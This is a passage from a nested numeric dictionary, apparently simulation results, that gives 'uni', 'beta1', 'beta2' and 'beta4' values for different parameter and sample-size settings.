[0.004346224166041328, 1.0878846972621905]}, 300: {'uni': 0.04520325219647054, 'beta1': 0.0025501491440857887, 'beta2': 0.28592593421863094, 'beta4': [0.005324036219642212, 1.0691502375303021]}, 200: {'uni': 0.060109075263989446, 'beta1': 0.0052223884602183, 'beta2': 0.3125300226275192, 'beta4': [0.009280681826497663, 1.061558045261655]}, 150: {'uni': 0.07576829707995025, 'beta1': 0.007564903489288599, 'beta2': 0.3427799333015165, 'beta4': [0.011798396618607104, 1.0571740473117883]}, 100: {'uni': 0.11065680954182613, 'beta1': 0.01869098098454615, 'beta2': 0.4074253856786578, 'beta4': [0.015345065823318946, 1.0495661343336482]}, 75: {'uni': 0.12655190907350036, 'beta1': 0.03233447613785924, 'beta2': 0.4488100553399162, 'beta4': [0.024128531781180237, 1.0457037327331788]}, 50: {'uni': 0.17398297564543322, 'beta1': 0.05681149532603595, 'beta2': 0.4627537389486546, 'beta4': [0.030088173703089676, 1.036191980100532]}, 30: {'uni': 0.2783538553040459, 'beta1': 0.11152420121298304, 'beta2': 0.5659592579757353, 'beta4': [0.044256366871811184, 1.032758713111244]}, 20: {'uni': 0.40117304365295786, 'beta1': 0.2243708212441248, 'beta2': 0.6328241267767309, 'beta4': [0.05549991056298481, 1.0242052145141003]}, 10: {'uni': 0.5663957187651154, 'beta1': 0.367708243523239, 'beta2': 0.7561886475209632, 'beta4': [0.08503946611358437, 1.018904469921347]}}, 300: {1000: {'uni': 0.044566279105790474, 'beta1': 0.003327100530729034, 'beta2': 0.24078148356606432, 'beta4': [0.007288512460233923, 1.1407560034413293]}, 750: {'uni': 0.04277094007544684, 'beta1': 0.0021792994032752817, 'beta2': 0.3059000327593824, 'beta4': [0.006180875297249271, 1.1416369645421611]}, 500: {'uni': 0.035686740283980896, 'beta1': 0.0031967310027901977, 'beta2': 0.26516243628185904, 'beta4': [0.006373897578729658, 1.118051730471194]}, 400: {'uni': 0.03962556425612263, 'beta1': 0.00302236885935727, 'beta2': 0.28268247076294517, 'beta4': [0.006505476273152509, 1.1195062441426369]}, 300: {'uni': 0.03952239211713717, 'beta1': 0.002251421100688415, 'beta2': 0.2925527201127294, 'beta4': [0.00627083227986432, 1.0947897660301564]}, 200: {'uni': 0.05376346846673587, 'beta1': 0.0056129209261833535, 'beta2': 0.3045540431166837, 'beta4': [0.008073612074167416, 1.0780367857898463]}, 150: {'uni': 0.06707689863621345, 'beta1': 0.011476123926329301, 'beta2': 0.32317902238154983, 'beta4': [0.010910287838315519, 1.0784206140124115]}, 100: {'uni': 0.11377796787499908, 'beta1': 0.017237766709165093, 'beta2': 0.39768431902260115, 'beta4': [0.017631802606458878, 1.0682337278229384]}, 75: {'uni': 0.13894361913665587, 'beta1': 0.034186434799691474, 'beta2': 0.42306830656659034, 'beta4': [0.020660954120022272, 1.055028950778487]}, 50: {'uni': 0.24645011563196215, 'beta1': 0.060091771835968005, 'beta2': 0.4754042570886038, 'beta4': [0.029688920539531042, 1.0479568249986413]}, 30: {'uni': 0.28440873282543555, 'beta1': 0.109482940639056, 'beta2': 0.549994604048401, 'beta4': [0.04505001011774477, 1.037756617970666]}, 20: {'uni': 0.3850513892674541, 'beta1': 0.18201980352057348, 'beta2': 0.60256622468304, 'beta4': [0.06367752118379469, 1.0351258834952837]}, 10: {'uni': 0.5628533038813214, 'beta1': 0.3407017594138133, 'beta2': 0.7477263579938394, 'beta4': [0.09592116572544965, 1.022312456228958]}}, 200: {1000: {'uni': 0.051601596152469564, 'beta1': 0.006491242570563972, 'beta2': 0.3164865095370956, 'beta4': [0.008515436068305947, 1.2250561343578927]}, 750: {'uni': 0.05613472283253878, 'beta1': 0.006185240425682315, 'beta2': 0.3200056117230271, 'beta4': [0.009431110687418993, 1.1808048095372374]}, 500: {'uni': 0.05414951218228231, 'beta1': 0.005424286099782189, 'beta2': 0.2896123389973014, 'beta4': [0.008729410861757693, 1.156445325855722]}, 400: {'uni': 0.059769732308283904, 'beta1': 0.007709482270162348, 'beta2': 0.3211568642021472, 'beta4': [0.00943841263293194, 1.1436174420814718]}, 300: {'uni': 0.0671236882849256, 'beta1': 0.013165057157040751, 'beta2': 0.3074804572409215, 'beta4': [0.008674766530753029, 1.1551805439752956]}, 200: {'uni': 0.05940380948969049, 'beta1': 0.008940837305905933, 'beta2': 0.3068678000469144, 'beta4': [0.008468628870642946, 1.1144914248339726]}, 150: {'uni': 0.07051256848164812, 'beta1': 0.01231387540113938, 'beta2': 0.3734112375168418, 'beta4': [0.011635530187338912, 1.1102344418624115]}, 100: {'uni': 0.1282684380789726, 'beta1': 0.016640339898161893, 'beta2': 0.39116647758434087, 'beta4': [0.017474878824371418, 1.0990514429552851]}, 75: {'uni': 0.1388309766758086, 'beta1': 0.025448616151534417, 'beta2': 0.45250946908108447, 'beta4': [0.023311701330211987, 1.083242075394765]}, 50: {'uni': 0.17657749869850825, 'beta1': 0.06590868264165664, 'beta2': 0.48642256198348116, 'beta4': [0.028818054716693024, 1.0722919065661418]}, 30: {'uni': 0.32013439830903245, 'beta1': 0.11118974873831032, 'beta2': 0.5613232063927698, 'beta4': [0.04081080838254353, 1.0552597162547668]}, 20: {'uni': 0.38424963752626534, 'beta1': 0.17660282729028604, 'beta2': 0.593322847020505, 'beta4': [0.05494264637722776, 1.0459229007658148]}, 10: {'uni': 0.5184288204086329, 'beta1': 0.38782813410673844, 'beta2': 0.7328305414558911, 'beta4': [0.08660308646383802, 1.0377583841616613]}}, 150: {1000: {'uni': 0.06880107878218425, 'beta1': 0.009598485908326378, 'beta2': 0.3197001858692086, 'beta4': [0.0115533026707448, 1.2515620374494822]}, 750: {'uni': 0.0671538349318563, 'beta1': 0.014647157229541262, 'beta2': 0.375933792122322, 'beta4': [0.014940923590390768, 1.2659371027967505]}, 500: {'uni': 0.07579941138021336, 'beta1': 0.013754198701614238, 'beta2': 0.39570733064249597, 'beta4': [0.014561840496955112, 1.2086766334984447]}, 400: {'uni': 0.0847281819234035, 'beta1': 0.008910478557270205, 'beta2': 0.3666666885993351, 'beta4': [0.012852767161018493, 1.2068807776896686]}, 300: {'uni': 0.08275727613852064, 'beta1': 0.009015687407474727, 'beta2': 0.3471630079992819, 'beta4': [0.012103178530792815, 1.1972581680617507]}, 200: {'uni': 0.0699359902862645, 'beta1': 0.009384943893264627, 'beta2': 0.3269694126933192, 'beta4': [0.011187014417355612, 1.1810564835980994]}, 150: {'uni': 0.08068630534099007, 'beta1': 0.013117986655350801, 'beta2': 0.3822122264853986, 'beta4': [0.013664905276287356, 1.1479655026499307]}, 100: {'uni': 0.10274077669371745, 'beta1': 0.02514437513488057, 'beta2': 0.38582280171054567, 'beta4': [0.015032971481420694, 1.1365471408564738]}, 75: {'uni': 0.1348170016638727, 'beta1': 0.03443745035471468, 'beta2': 0.4157108199307209, 'beta4': [0.01875505481793789, 1.1127844118652421]}, 50: {'uni': 0.19293945781097221, 'beta1': 0.054828889323951385, 'beta2': 0.433458306476045, 'beta4': [0.03510746977521885, 1.0896411928401573]}, 30: {'uni': 0.2898196959850388, 'beta1': 0.11828649409279716, 'beta2': 0.519891016190952, 'beta4': [0.04140751936809961, 1.0735803416018648]}, 20: {'uni': 0.3761111120943085, 'beta1': 0.1860423597466752, 'beta2': 0.6015283358377184, 'beta4': [0.05855148221335893, 1.069790984842932]}, 10: {'uni': 0.5740144616695647, 'beta1': 0.3906152950549322, 'beta2': 0.743599714948697, 'beta4': [0.08689760856128591, 1.050307480515673]}}, 100: {1000: {'uni': 0.10099521848726027, 'beta1': 0.026645236836375326, 'beta2': 0.4561009377668412, 'beta4': [0.021664452129982456, 1.392173473496957]}, 750: {'uni': 0.1129539961558924, 'beta1': 0.0213008367839638, 'beta2': 0.5636820614328856, 'beta4': [0.025867002400168083, 1.3748477673872852]}, 500: {'uni': 0.13246151241247883, 'beta1': 0.017762693718526533, 'beta2': 0.4066575501194243, 'beta4': [0.02093940465927965, 1.379384860789293]}, 400: {'uni': 0.11017063968512505, 'beta1': 0.023890314699091485, 'beta2': 0.3877834593983558, 'beta4': [0.019903776791393917, 1.3299478081944538]}, 300: {'uni': 0.16846581725687973, 'beta1': 0.021247654758048126, 'beta2': 0.3876626946907388, 'beta4': [0.017170755289126795, 1.3070608648942346]}, 200: {'uni': 0.11450225522323053, 'beta1': 0.03447492619969185, 'beta2': 0.43616025388644963, 'beta4': [0.019008447347663, 1.2556973492967485]}, 150: {'uni': 0.13539117909597762, 'beta1': 0.020847767798978102, 'beta2': 0.5426589645895388, 'beta4': [0.02008844669853126, 1.212436060212826]}, 100: {'uni': 0.12395958532813696, 'beta1': 0.026023867138296748, 'beta2': 0.41567054621152966, 'beta4': [0.016312695398788834, 1.1934267130464744]}, 75: {'uni': 0.14958491655531964, 'beta1': 0.031328587828317545, 'beta2': 0.43539171455677583, 'beta4': [0.024389470944773287, 1.18591210476864]}, 50: {'uni': 0.20866608846080864, 'beta1': 0.0738343960442376, 'beta2': 0.46150269335210786, 'beta4': [0.03578478824558125, 1.1375845053243308]}, 30: {'uni': 0.2765100135009761, 'beta1': 0.10827097512399869, 'beta2': 0.5373945228642734, 'beta4': [0.04369745106389154, 1.127526956638849]}, 20: {'uni': 0.3823407507282141, 'beta1': 0.1999235052735679, 'beta2': 0.6038440766159979, 'beta4': [0.05885220974852782, 1.1023317863265667]}, 10: {'uni': 0.5298206414110227, 'beta1': 0.35708844112316296, 'beta2': 0.7239655162112311, 'beta4': [0.09086303269946881, 1.0771590457606335]}}, 75: {1000: {'uni': 0.16101820508997058, 'beta1': 0.0392663030910949, 'beta2': 0.5955010581399385, 'beta4': [0.028166682841671876, 1.4850878870706135]}, 750: {'uni': 0.13400430917278547, 'beta1': 0.05186636043863356, 'beta2': 0.47891299647806207, 'beta4': [0.023805416421474473, 1.5109324828309596]}, 500: {'uni': 0.15033015022241447, 'beta1': 0.03498316710360079, 'beta2': 0.5770284290238726, 'beta4': [0.023372147158943823, 1.4093787391715362]}, 400: {'uni': 0.1531914829080008, 'beta1': 0.03781775380753009, 'beta2': 0.48308220257966694, 'beta4': [0.026036202653387366, 1.3894387213434034]}, 300: {'uni': 0.140096050494891, 'beta1': 0.047058302826873004, 'beta2': 0.48763956543855647, 'beta4': [0.025154254231467974, 1.3428703157935498]}, 200: {'uni': 0.1695800443031254, 'beta1': 0.03248996820371958, 'beta2': 0.4993172041736475, 'beta4': [0.02447051797136617, 1.3717654226221188]}, 150: {'uni': 0.1746878943796265, 'beta1': 0.03620855583816983, 'beta2': 0.43462449526898567, 'beta4': [0.027158912702479637, 1.287118609178937]}, 100: {'uni': 0.17674936395333152, 'beta1': 0.04584363097014311, 'beta2': 0.5011652752537196, 'beta4': [0.023203397617561898, 1.281352064318893]}, 75: {'uni': 0.16666336190194875, 'beta1': 0.043759999233142555, 'beta2': 0.5854013951049823, 'beta4': [0.025734039291296158, 1.2513099214564491]}, 50: {'uni': 0.19778123745684092, 'beta1': 0.05857582115085566, 'beta2': 0.6491458878476999, 'beta4': [0.027734464855309886, 1.2186804525897197]}, 30: {'uni': 0.2908349398537664, 'beta1': 0.12303564804929479, 'beta2': 0.6579127634146081, 'beta4': [0.03925267307683, 1.1786830486510413]}, 20: {'uni': 0.3870059702226258, 'beta1': 0.1638510250315426, 'beta2': 0.6204378214586946, 'beta4': [0.06209409909141029, 1.1517104578692603]}, 10: {'uni': 0.5355522101172704, 'beta1': 0.35408050675108815, 'beta2': 0.7285108013888837, 'beta4': [0.08430842704984991, 1.097394751106502]}}, 50: {1000: {'uni': 0.22424609164297443, 'beta1': 0.10025843798909305, 'beta2': 0.6109226727203947, 'beta4': [0.03924165854902822, 1.6267421226716416]}, 750: {'uni': 0.2537903023335899, 'beta1': 0.07416880769129822, 'beta2': 0.5080375269871897, 'beta4': [0.03314676909701872, 1.5589018573309383]}, 500: {'uni': 0.23308360263225839, 'beta1': 0.09163661437479734, 'beta2': 0.5477035534119664, 'beta4': [0.034651811631448516, 1.4984262997193514]}, 400: {'uni': 0.2135555660715244, 'beta1': 0.10738424676399555, 'beta2': 0.7301181390917937, 'beta4': [0.044360696665479454, 1.5793090007440191]}, 300: {'uni': 0.20845412309578348, 'beta1': 0.07774222049722822, 'beta2': 0.5953760006140618, 'beta4': [0.03279491280419391, 1.627027852109703]}, 200: {'uni': 0.24319321692664747, 'beta1': 0.13124268707554892, 'beta2': 0.6370589117638976, 'beta4': [0.03790435948557217, 1.4455538593119952]}, 150: {'uni': 0.2376511481632187, 'beta1': 0.07273309414631492, 'beta2': 0.544820369601891, 'beta4': [0.05862998404005149, 1.4572932486873187]}, 100: {'uni': 0.29513109730105114, 'beta1': 0.08860359124141814, 'beta2': 0.5285161783868962, 'beta4': [0.038192643880053403, 1.3806124902781127]}, 75: {'uni': 0.2749288556572405, 'beta1': 0.13174377627922593, 'beta2': 0.7017994016865113, 'beta4': [0.03527787509171762, 1.372290745982181]}, 50: {'uni': 0.2543344897457348, 'beta1': 0.09211055678263366, 'beta2': 0.7093382651151694, 'beta4': [0.036485429499135996, 1.2745825598839697]}, 30: {'uni': 0.2927948306959651, 'beta1': 0.13810074460874613, 'beta2': 0.6809517549251869, 'beta4': [0.03995430405381426, 1.2517503144067612]}, 20: {'uni': 0.37086983572719695, 'beta1': 0.19185529125873838, 'beta2': 0.6183400380730043, 'beta4': [0.056908678575848075, 1.201276519869532]}, 10: {'uni': 0.5357005611311981, 'beta1': 0.3557142999459758, 'beta2': 0.7117358313845611, 'beta4': [0.08832001083612763, 1.1772531157292991]}}, 30: {1000: {'uni': 0.5375517058914333, 'beta1': 0.18682553850708347, 'beta2': 0.9623725671332998, 'beta4': [0.05111006116199637, 2.1284403063269264]}, 750: {'uni': 0.3577356511491193, 'beta1': 0.2793514883989638, 'beta2': 1.0975406538160377, 'beta4': [0.07097824896206201, 1.9871758843512004]}, 500: {'uni': 0.702141698978866, 'beta1': 0.26555631462924306, 'beta2': 0.9740832893485976, 'beta4': [0.05511187550828117, 1.9841038060295242]}, 400: {'uni': 0.5145446263289309, 'beta1': 0.25794540644995834, 'beta2': 0.828981279891515, 'beta4': [0.06082742626722804, 1.9147202001621995]}, 300: {'uni': 0.4711936487014286, 'beta1': 0.1868542186385208, 'beta2': 0.833463071793256, 'beta4': [0.06651105115357443, 1.97384106365458]}, 200: {'uni': 0.4663956914615083, 'beta1': 0.35256215108473493, 'beta2': 0.8182432862218997, 'beta4': [0.06304111167477797, 1.844645269837164]}, 150: {'uni': 0.433320385683165, 'beta1': 0.2102749321540168, 'beta2': 0.8212444381853243, 'beta4': [0.06040506583522945, 1.7983824565568507]}, 100: {'uni': 0.3812474998448387, 'beta1': 0.22786614409158085, 'beta2': 0.9538255457719403, 'beta4': [0.06026497731561029, 1.7234749363367283]}, 75: {'uni': 0.40094360554599134, 'beta1': 0.23875103233048597, 'beta2': 0.7715118646556511, 'beta4': [0.062243334302248675, 1.6706938143747165]}, 50: {'uni': 0.5023984324782755, 'beta1': 0.21032346823013254, 'beta2': 0.8476224401417406, 'beta4': [0.05376929125174212, 1.5076303475283628]}, 30: {'uni': 0.5022316018535551, 'beta1': 0.19211174291043182, 'beta2': 0.9852383031978549, 'beta4': [0.055882813612441865, 1.5053037754614005]}, 20: {'uni': 0.42257652007685287, 'beta1': 0.2648788987026799, 'beta2': 1.0097366578988298, 'beta4': [0.05212870119742689, 1.3587734455424478]}, 10: {'uni': 0.5752945517368767, 'beta1': 0.3824332965187248, 'beta2': 1.1642452986239304, 'beta4': [0.09422116258863913, 1.2546417636878537]}}, 20: {1000: {'uni': 0.8245658279493084, 'beta1': 0.6714293037543387, 'beta2': 1.1403508046288549, 'beta4': [0.08965514010313543, 2.355993522309204]}, 750: {'uni': 0.7522973791112813, 'beta1': 0.5001791028253899, 'beta2': 1.9167065498955769, 'beta4': [0.08700394872889188, 2.606628099310203]}, 500: {'uni': 0.6830218938900532, 'beta1': 0.5669378077763796, 'beta2': 1.3620749239695735, 'beta4': [0.09055668995699578, 2.324014882888129]}, 400: {'uni': 0.6717027010335322, 'beta1': 0.5881516513277326, 'beta2': 1.2381092252485557, 'beta4': [0.08982533008390195, 2.871104248026336]}, 300: {'uni': 0.7200071531914536, 'beta1': 0.5639971175195339, 'beta2': 1.2954861108358184, 'beta4': [0.10664037978442996, 2.513620523930525]}, 200: {'uni': 0.5904276032048987, 'beta1': 0.4988005660867027, 'beta2': 1.0996965576942577, 'beta4': [0.07945828546825576, 2.403024638109359]}, 150: {'uni': 0.6221222720189126, 'beta1': 0.594144837149773, 'beta2': 1.1617999336669014, 'beta4': [0.1009825524269249, 2.206361430979434]}, 100: {'uni': 0.6143584688855093, 'beta1': 0.5096177815955042, 'beta2': 1.2546626538685803, 'beta4': [0.08413959400017983, 2.0981666855413628]}, 75: {'uni': 0.8785772478481102, 'beta1': 0.437936732164422, 'beta2': 1.2111561571681346, 'beta4': [0.09396307393791267, 2.359982618370008]}, 50: {'uni': 0.7025752082031005, 'beta1': 0.7186578378289812, 'beta2': 1.2601942541642712, 'beta4': [0.10511632552075476, 1.9884553426902782]}, 30: {'uni': 0.5810201916470588, 'beta1': 0.5995612994384831, 'beta2': 1.4948812858640488, 'beta4': [0.10689852453889333, 1.718598639290735]}, 20: {'uni': 0.6559192165274909, 'beta1': 0.6258327950669433, 'beta2': 1.3153066332074126, 'beta4': [0.08394879019729243, 1.73085600993384]}, 10: {'uni': 0.7114215669900594, 'beta1': 0.5110631063073926, 'beta2': 1.1962015407227755, 'beta4': [0.09298919262453555, 1.540883640483407]}}, 10: {1000: {'uni': 1.9583677469218963, 'beta1': 2.576333617343919, 'beta2': 2.461211967994449, 'beta4': [0.19243838699722618, 3.779369929492513]}, 750: {'uni': 1.938215880657949, 'beta1': 5.391824254480648, 'beta2': 2.6331851083484, 'beta4': [0.21832884837162334, 5.159307970428041]}, 500: {'uni': 2.085024738289965, 'beta1': 3.5133109540444565, 'beta2': 2.382220369676619, 'beta4': [0.16933641621151063, 4.311941729154879]}, 400: {'uni': 2.3249797168528294, 'beta1': 2.0137087338200947, 'beta2': 6.012764801850701, 'beta4': [0.17567403680412053, 3.5548840861243423]}, 300: {'uni': 3.3198326153076034, 'beta1': 2.4070810291499973, 'beta2': 3.717530102940286, 'beta4': [0.19086555116543857, 3.349825429053164]}, 200: {'uni': 2.0254293672943193, 'beta1': 2.299309830454076, 'beta2': 2.7160076476196853, 'beta4': [0.20201006223755733, 5.303158103378205]}, 150: {'uni': 3.282500960658318, 'beta1': 2.1207065638469773, 'beta2': 1.9410779695397329, 'beta4': [0.14779914391992724, 4.172672748245124]}, 100: {'uni': 1.7067606545068066, 'beta1': 2.6790345925314645, 'beta2': 2.642466168596247, 'beta4': [0.17375693292954014, 3.7555270616484635]}, 75: {'uni': 2.1111537004767342, 'beta1': 2.1926293662494176, 'beta2': 2.644392554644403, 'beta4': [0.16479647222509328, 4.265566144423463]}, 50: {'uni': 2.4816574374593925, 'beta1': 3.225545355279228, 'beta2': 2.427281968416075, 'beta4': [0.21343736012593248, 3.8444544657885107]}, 30: {'uni': 3.1974645398096033, 'beta1': 2.009092390657058, 'beta2': 3.3306193769470287, 'beta4': [0.18325118281932046, 3.195752438854362]}, 20: {'uni': 2.311115457162956, 'beta1': 2.438462691037925, 'beta2': 2.317809029574652, 'beta4': [0.1619449311199175, 2.72060854124639]}, 10: {'uni': 1.860495572909103, 'beta1': 2.4763788602224275, 'beta2': 2.7556546342359924, 'beta4': [0.16743973925875363, 3.272261832564597]}}}, 0.3: {1000: {1000: {'uni': 0.012795174678120393, 'beta1': 0.0002679565864041922, 'beta2': 0.18742635617723044, 'beta4': [0.0017826444891534108, 1.0522042104131124]}, 750: {'uni': 0.018336935363620903, 'beta1': 0.0004754746110374862, 'beta2': 0.18408175297923784, 'beta4': [0.002563961983437563, 1.043912703454493]}, 500: {'uni': 0.023414907512510984, 'beta1': 0.0008285030084488381, 'beta2': 0.21392690782659204, 'beta4': [0.0033738177625835283, 1.0394032441990042]}, 400: {'uni': 0.03177120193768, 'beta1': 0.0019733869982122105, 'beta2': 0.2467648002510673, 'beta4': [0.004811261032941804, 1.033240580519976]}, 300: {'uni': 0.03815290820877515, 'beta1': 0.002748482329194836, 'beta2': 0.2727747044827896, 'beta4': [0.007856020418320583, 1.0290961116997555]}, 200: {'uni': 0.08507691017511126, 'beta1': 0.004948573058538693, 'beta2': 0.3011091377193825, 'beta4': [0.009638805999161303, 1.0242636316798672]}, 150: {'uni': 0.07472797369113161, 'beta1': 0.01904392003417618, 'beta2': 0.337378405759772, 'beta4': [0.010533899245420439, 1.0217123696885337]}, 100: {'uni': 0.11077744339928126, 'beta1': 0.01920778151803272, 'beta2': 0.40483316774024947, 'beta4': [0.01789711695444819, 1.018186238923615]}, 75: {'uni': 0.11990949678305865, 'beta1': 0.029631460430197737, 'beta2': 0.4499087467731683, 'beta4': [0.028082405545207613, 1.0150370158274151]}, 50: {'uni': 0.19372523646892206, 'beta1': 0.06105398151552832, 'beta2': 0.49624656830731617, 'beta4': [0.03241573448860706, 1.0149051848586808]}, 30: {'uni': 0.28264799923765627, 'beta1': 0.10436396811276909, 'beta2': 0.5513000690922769, 'beta4': [0.043785922945529736, 1.0104075965139894]}, 20: {'uni': 0.35244841088708184, 'beta1': 0.15811742222657982, 'beta2': 0.6484490905373989, 'beta4': [0.053071394096319016, 1.0091627612927796]}, 10: {'uni': 0.5663818741625132, 'beta1': 0.32324795092972336, 'beta2': 0.7377822567041101, 'beta4': [0.08935636518216408, 1.007346648489344]}}, 750: {1000: {'uni': 0.014485201643862624, 'beta1': 0.0006629138723885677, 'beta2': 0.19299740873601873, 'beta4': [0.0029912098349708974, 1.0635084767551528]}, 750: {'uni': 0.016020228660910164, 'beta1': 0.00044792258619544436, 'beta2': 0.20362324734215456, 'beta4': [0.0028190004783775315, 1.0553314938332476]}, 500: {'uni': 0.019975736604073733, 'beta1': 0.0009383156184602303, 'beta2': 0.21272444569670917, 'beta4': [0.00389143518085255, 1.0465923539174913]}, 400: {'uni': 0.031365488090823956, 'beta1': 0.0020041954646797533, 'beta2': 0.22929318942136415, 'beta4': [0.004484087249726235, 1.0438364985477657]}, 300: {'uni': 0.04640849666921278, 'beta1': 0.0024450870414352735, 'beta2': 0.27450264141297454, 'beta4': [0.006205938298724309, 1.0385476373907243]}, 200: {'uni': 0.06093139793221171, 'beta1': 0.005970997391722452, 'beta2': 0.30214900952475965, 'beta4': [0.009566235751639111, 1.031822806243974]}, 150: {'uni': 0.07407127426735613, 'beta1': 0.011762584862298439, 'beta2': 0.34520256227724017, 'beta4': [0.013083866983431237, 1.0276022904521596]}, 100: {'uni': 0.1049528175541805, 'beta1': 0.02650540954490502, 'beta2': 0.3999251150350931, 'beta4': [0.01622328062265029, 1.029934149910967]}, 75: {'uni': 0.13773478941322262, 'beta1': 0.030231711864218847, 'beta2': 0.4443294917949243, 'beta4': [0.020382021855895858, 1.0225043552068545]}, 50: {'uni': 0.18860277419001642, 'beta1': 0.048683316697604964, 'beta2': 0.5017857392818516, 'beta4': [0.030640384132032683, 1.0175511796414718]}, 30: {'uni': 0.274229496564352, 'beta1': 0.10553107700842067, 'beta2': 0.6047299624940808, 'beta4': [0.04159495872030207, 1.013590583317765]}, 20: {'uni': 0.3311173740302474, 'beta1': 0.18025665597220492, 'beta2': 0.6559673224772654, 'beta4': [0.05677363500512058, 1.0111469897526215]}, 10: {'uni': 0.5503083494942063, 'beta1': 0.3378803618674342, 'beta2': 0.7382975365394384, 'beta4': [0.08012641482289543, 1.007993647568211]}}, 500: {1000: {'uni': 0.020087175565086567, 'beta1': 0.0013935125324983928, 'beta2': 0.21141747412315226, 'beta4': [0.0032526585097433225, 1.0923841201536304]}, 750: {'uni': 0.023119803219004583, 'beta1': 0.0014919615457760513, 'beta2': 0.2215561352923942, 'beta4': [0.0036458796217003326, 1.083706733679476]}, 500: {'uni': 0.02634673909588432, 'beta1': 0.0012884012398439958, 'beta2': 0.22853225772196686, 'beta4': [0.0038840363233813725, 1.070851191946351]}, 400: {'uni': 0.027863611247881087, 'beta1': 0.0019548832749742423, 'beta2': 0.2660337820317211, 'beta4': [0.006843790543473078, 1.0660486796885624]}, 300: {'uni': 0.04195199023609443, 'beta1': 0.005604419821151305, 'beta2': 0.2673400467917025, 'beta4': [0.005845307042980669, 1.0610970046028447]}, 200: {'uni': 0.060425411269776755, 'beta1': 0.004629539818339217, 'beta2': 0.33400473721899254, 'beta4': [0.009584650972333094, 1.045076938855807]}, 150: {'uni': 0.07429990877171826, 'beta1': 0.009017861104543, 'beta2': 0.31564503571293595, 'beta4': [0.012220242128090822, 1.047639871284981]}, 100: {'uni': 0.10052225463410921, 'beta1': 0.01956089088384902, 'beta2': 0.36499669372521054, 'beta4': [0.015972577920426997, 1.0341821005789347]}, 75: {'uni': 0.13303851391596935, 'beta1': 0.03598466037575139, 'beta2': 0.4319783884267612, 'beta4': [0.023312914741063458, 1.0320364684089665]}, 50: {'uni': 0.16924151473552013, 'beta1': 0.05098263622341181, 'beta2': 0.47987054682960817, 'beta4': [0.030628113292411226, 1.0253445151693896]}, 30: {'uni': 0.2730853650116837, 'beta1': 0.11958830964796402, 'beta2': 0.5763957024769127, 'beta4': [0.044802580459368586, 1.021053806102985]}, 20: {'uni': 0.34877051560558964, 'beta1': 0.1774726992994486, 'beta2': 0.596517800478609, 'beta4': [0.05608609680158825, 1.0178953367755723]}, 10: {'uni': 0.5382064508681208, 'beta1': 0.34840656929213076, 'beta2': 0.7391836182227792, 'beta4': [0.08303014814835374, 1.0146320825991233]}}, 400: {1000: {'uni': 0.026209806342155622, 'beta1': 0.0012528034498248254, 'beta2': 0.23529367745856108, 'beta4': [0.004320805230985572, 1.112419848894135]}, 750: {'uni': 0.026109204738674938, 'beta1': 0.0015676344082384457, 'beta2': 0.22068244545328733, 'beta4': [0.004474057841167138, 1.094215835056832]}, 500: {'uni': 0.029454600480680656, 'beta1': 0.001397911455226279, 'beta2': 0.24122137931570758, 'beta4': [0.003996336121194239, 1.0858975355177618]}, 400: {'uni': 0.0299979365013004, 'beta1': 0.0016324361130554963, 'beta2': 0.25514254631092853, 'beta4': [0.005012661134952242, 1.075586195091313]}, 300: {'uni': 0.04106239413269716, 'beta1': 0.00265492909809163, 'beta2': 0.2676813799664323, 'beta4': [0.00574872945436531, 1.0777848197004376]}, 200: {'uni': 0.07010191864996612, 'beta1': 0.007739385258328493, 'beta2': 0.28844627964158687, 'beta4': [0.009606054283202024, 1.0623623041267098]}, 150: {'uni': 0.07548793732876151, 'beta1': 0.007173838150662292, 'beta2': 0.31944202255614057, 'beta4': [0.010475083204453681, 1.0535667495755432]}, 100: {'uni': 0.13012977421092564, 'beta1': 0.01950906919380695, 'beta2': 0.38456733938185056, 'beta4': [0.014565591838886616, 1.0444994537785801]}, 75: {'uni': 0.12879610969461608, 'beta1': 0.03316885761904827, 'beta2': 0.4344096694228591, 'beta4': [0.02186931697757683, 1.0417307188802103]}, 50: {'uni': 0.19587048133869084, 'beta1': 0.06726717689172765, 'beta2': 0.4837317952295418, 'beta4': [0.03044567966820428, 1.0316798043768414]}, 30: {'uni': 0.2885105758490185, 'beta1': 0.09253031031163511, 'beta2': 0.5426595128852456, 'beta4': [0.044357799095975335, 1.0277129264951208]}, 20: {'uni': 0.3423360016646393, 'beta1': 0.15320983210606476, 'beta2': 0.6150709939528051, 'beta4': [0.06269025330982703, 1.0238961558784514]}, 10: {'uni': 0.5638941332248057, 'beta1': 0.34883930616627784, 'beta2': 0.732850978191352, 'beta4': [0.08097781812359789, 1.0183696008339012]}}, 300: {1000: {'uni': 0.03697391950538826, 'beta1': 0.0037587290091272542, 'beta2': 0.2941880452433283, 'beta4': [0.0062970688023370105, 1.140943658481785]}, 750: {'uni': 0.04459852541100737, 'beta1': 0.002386072912073571, 'beta2': 0.2659829977334984, 'beta4': [0.007119765549883499, 1.1206843223162462]}, 500: {'uni': 0.0357683843109935, 'beta1': 0.0027726863173718644, 'beta2': 0.23609524241025398, 'beta4': [0.005949250566485548, 1.1125558721619353]}, 400: {'uni': 0.03435278048786573, 'beta1': 0.002906613367063174, 'beta2': 0.30866043135716725, 'beta4': [0.006143500069286727, 1.1107577665751034]}, 300: {'uni': 0.045849196840483344, 'beta1': 0.004380918345796293, 'beta2': 0.2771671252127634, 'beta4': [0.006634063460291386, 1.087017134330869]}, 200: {'uni': 0.053859418965440456, 'beta1': 0.0062719069457408405, 'beta2': 0.2963923468974883, 'beta4': [0.008099159991741616, 1.0792869480721894]}, 150: {'uni': 0.07066337263399719, 'beta1': 0.008736997723679881, 'beta2': 0.3251019472842105, 'beta4': [0.013913289456289137, 1.0683038989936084]}, 100: {'uni': 0.09981841785248288, 'beta1': 0.025440638493153908, 'beta2': 0.3966524688792758, 'beta4': [0.01605404277263024, 1.0652860963007686]}, 75: {'uni': 0.15105316789466477, 'beta1': 0.03915037732452085, 'beta2': 0.41626942092060754, 'beta4': [0.02191579411280009, 1.0523909796365454]}, 50: {'uni': 0.17484256812179605, 'beta1': 0.04497383262749608, 'beta2': 0.45572339594264294, 'beta4': [0.02820511965000463, 1.0452251008842077]}, 30: {'uni': 0.2606590603145417, 'beta1': 0.11969227776465383, 'beta2': 0.5252303693074646, 'beta4': [0.038352104328644714, 1.0348049324704034]}, 20: {'uni': 0.3856413645220924, 'beta1': 0.15140885200484566, 'beta2': 0.6319959664924306, 'beta4': [0.05857015440594212, 1.027654094293965]}, 10: {'uni': 0.5118825279100839, 'beta1': 0.3335710648200135, 'beta2': 0.741387039678667, 'beta4': [0.0859932696959542, 1.024719711098674]}}, 200: {1000: {'uni': 0.05151262491969304, 'beta1': 0.00557100210213531, 'beta2': 0.2668825327634389, 'beta4': [0.010538893374802173, 1.2171655533105397]}, 